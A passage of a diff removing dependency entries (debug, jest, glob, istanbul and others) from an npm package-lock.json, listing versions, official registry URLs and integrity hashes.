"sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", - "requires": { - "assert-plus": "^1.0.0" - } - }, - "debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "requires": { - "ms": "2.1.2" - } - }, - "dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true - }, - "delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==" - }, - "detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true - }, - "diff-sequences": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.4.3.tgz", - "integrity": "sha512-ofrBgwpPhCD85kMKtE9RYFFq6OC1A89oW2vvgWZNCwxrUpRUILopY7lsYyMDSjc8g6U6aiO0Qubg6r4Wgt5ZnA==", - "dev": true - }, - "ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", - "requires": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - }, - "dependencies": { - "jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" - } - } - }, - "electron-to-chromium": { - "version": "1.4.455", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.455.tgz", - "integrity": "sha512-8tgdX0Odl24LtmLwxotpJCVjIndN559AvaOtd67u+2mo+IDsgsTF580NB+uuDCqsHw8yFg53l5+imFV9Fw3cbA==", - "dev": true - }, - "emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "requires": { - "is-arrayish": "^0.2.1" - } - }, - "escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true - }, - "escape-string-regexp": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-4.0.0.tgz", - "integrity": "sha512-TtpcNJ3XAzx3Gq8sWRzJaVajRs0uVxA2YAkdb1jm2YkPz4G6egUFAyA3n5vtEIZefPk5Wa4UXbKuS5fKkJWdgA==" - }, - "esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true - }, - "execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "requires": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - } - }, - "exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true - }, - "expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-XEdDLonERCU1n9uR56/Stx9OqojaLAQtZf9PrCHH9Hl8YXiEIka3H4NXJ3NOIBmQJTg7+j7buh34PMHfJujc8g==", - "dev": true, - "requires": { - "@jest/expect-utils": "^29.6.1", - "@types/node": "*", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==" - }, - "fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" - }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" - }, - "fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "requires": { - "bser": "2.1.1" - } - }, - "fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "requires": { - "to-regex-range": "^5.0.1" - } - }, - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==" - }, - "form-data": { - "version": "2.5.1", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.5.1.tgz", - "integrity": "sha512-m21N3WOmEEURgk6B9GLOE4RuWOFf28Lhh9qGYeNlGq4VDXUlJy2th2slBNU8Gp8EzloYZOibZJ7t5ecIrFSjVA==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } - }, - "fs-minipass": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-2.1.0.tgz", - "integrity": "sha512-V/JgOLFCS+R6Vcq0slCuaeWEdNC3ouDlJMNIsacH2VtALiu9mV4LPrHc5cDl8k5aw6J8jwgWWpiTo5RYhmIzvg==", - "requires": { - "minipass": "^3.0.0" - }, - "dependencies": { - "minipass": { - "version": "3.3.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.3.6.tgz", - "integrity": "sha512-DxiNidxSEK+tHG6zOIklvNOwm3hvCrbUrdtzY74U6HKTJxvIDfOUL5W5P2Ghd3DTkhhKPYGqeNUIh5qcM4YBfw==", - "requires": { - "yallist": "^4.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" - } - } - }, - "fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "optional": true - }, - "function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true - }, - "get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true - }, - "get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true - }, - "get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true - }, - "getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", - "requires": { - "assert-plus": "^1.0.0" - } - }, - "glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "requires": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - } - }, - "globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true - }, - "graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==" - }, - "har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "requires": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - } - }, - "has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "requires": { - "function-bind": "^1.1.1" - } - }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true - }, - "html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", - "requires": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - } - }, - "human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true - }, - "import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "requires": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - } - }, - "imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true - }, - "inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "requires": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "ip-address": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-8.1.0.tgz", - "integrity": "sha512-Wz91gZKpNKoXtqvY8ScarKYwhXoK4r/b5QuT+uywe/azv0/nUCo7Bh0IRRI7F9DHR06kJNWtzMGLIbXavngbKA==", - "requires": { - "jsbn": "1.1.0", - "sprintf-js": "1.1.2" - } - }, - "ip-regex": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ip-regex/-/ip-regex-4.3.0.tgz", - "integrity": "sha512-B9ZWJxHHOHUhUjCPrMpLD4xEq35bUTClHM1S6CBU5ixQnkZmwipwgc96vAd7AAGM9TGHvJR+Uss+/Ak6UphK+Q==" - }, - "is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "is-core-module": { - "version": "2.12.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.12.1.tgz", - "integrity": "sha512-Q4ZuBAe2FUsKtyQJoQHlvP8OvBERxO3jEmy1I7hcRXcJBGGHFh/aJBswbXuS9sgrDH2QUO8ilkwNPHvHMd8clg==", - "dev": true, - "requires": { - "has": "^1.0.3" - } - }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true - }, - "is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true - }, - "is-ip": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/is-ip/-/is-ip-3.1.0.tgz", - "integrity": "sha512-35vd5necO7IitFPjd/YBeqwWnyDWbuLH9ZXQdMfDA8TEo7pv5X8yfrvVO3xbJbLUlERCMvf6X0hTUamQxCYJ9Q==", - "requires": { - "ip-regex": "^4.0.0" - } - }, - "is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true - }, - "is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true - }, - "is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "requires": {} - }, - "isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" - }, - "istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true - }, - "istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "requires": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - } - }, - "istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "requires": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - } - }, - "istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "requires": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - } - }, - "istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "requires": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - } - }, - "jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.6.1.tgz", - "integrity": "sha512-Nirw5B4nn69rVUZtemCQhwxOBhm0nsp3hmtF4rzCeWD7BkjAXRIji7xWQfnTNbz9g0aVsBX6aZK3n+23LM6uDw==", - "dev": true, - "requires": { - "@jest/core": "^29.6.1", - "@jest/types": "^29.6.1", - "import-local": "^3.0.2", - "jest-cli": "^29.6.1" - } - }, - "jest-changed-files": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.5.0.tgz", - "integrity": "sha512-IFG34IUMUaNBIxjQXF/iu7g6EcdMrGRRxaUSw92I/2g2YC6vCdTltl4nHvt7Ci5nSJwXIkCu8Ka1DKF+X7Z1Ag==", - "dev": true, - "requires": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - } - }, - "jest-circus": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.6.1.tgz", - "integrity": "sha512-tPbYLEiBU4MYAL2XoZme/bgfUeotpDBd81lgHLCbDZZFaGmECk0b+/xejPFtmiBP87GgP/y4jplcRpbH+fgCzQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.6.1", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.6.1", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-cli": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.6.1.tgz", - "integrity": "sha512-607dSgTA4ODIN6go9w6xY3EYkyPFGicx51a69H7yfvt7lN53xNswEVLovq+E77VsTRi5fWprLH0yl4DJgE8Ing==", - "dev": true, - "requires": { - "@jest/core": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - } - }, - "jest-config": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.6.1.tgz", - "integrity": "sha512-XdjYV2fy2xYixUiV2Wc54t3Z4oxYPAELUzWnV6+mcbq0rh742X2p52pii5A3oeRzYjLnQxCsZmp0qpI6klE2cQ==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.6.1", - "@jest/types": "^29.6.1", - "babel-jest": "^29.6.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.6.1", - "jest-environment-node": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - } - }, - "jest-diff": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.6.1.tgz", - "integrity": "sha512-FsNCvinvl8oVxpNLttNQX7FAq7vR+gMDGj90tiP7siWw1UdakWUGqrylpsYrpvj908IYckm5Y0Q7azNAozU1Kg==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.4.3", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-docblock": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.4.3.tgz", - "integrity": 